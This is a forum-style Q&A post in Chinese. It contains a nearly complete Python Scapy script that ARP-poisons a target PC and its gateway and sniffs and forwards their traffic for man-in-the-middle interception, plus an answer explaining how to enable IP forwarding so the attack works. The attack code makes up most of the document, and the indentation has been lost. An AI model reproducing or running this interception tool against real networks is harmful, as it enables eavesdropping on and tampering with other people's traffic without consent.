我已经使用scapy python代码成功地完成了ARP欺骗。网关目标电脑中的 mac 地址已更改为我的电脑的 mac 地址,路由器缓存中目标电脑的 mac adre 已添加到我的 mac 地址。现在我想通过我的电脑将这些数据包转发到相应的位置。这样我就可以看到目标PC和网关之间的流量。但它不起作用。
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
our_mac='d8:5d:e2:0c:58:87'
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
responses,unanswered =srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print"[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=100)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=100)
# signals the main thread to exit
print"[*] Target Restored..."
sys.exit(0)
os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
print "[*] ARP poison attack finished."
sys.exit(0)
return
def send_packet_to_gateway(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def send_packet_to_target(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def capture_packets():
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_target)
except KeyboardInterrupt:
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "It's interrupt"
sys.exit(0)
return
# start poison thread
poison_thread = threading.Thread(target = poison_target, args =(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
capture_thread = threading.Thread(target = capture_packets)
capture_thread.start()
bpf_filter = "src host %s and ether dst %s" % (target_ip,our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_gateway)
except KeyboardInterrupt:
sys.exit(0)
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
#sys.exit(0)
您不需要使用 Scapy 转发数据包。您可以启用 ip 转发,您的系统将自动转发数据包。在 linux 中,您可以运行以下命令:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
使用此命令,您只需要从 Scapy 运行毒药,而不是重定向。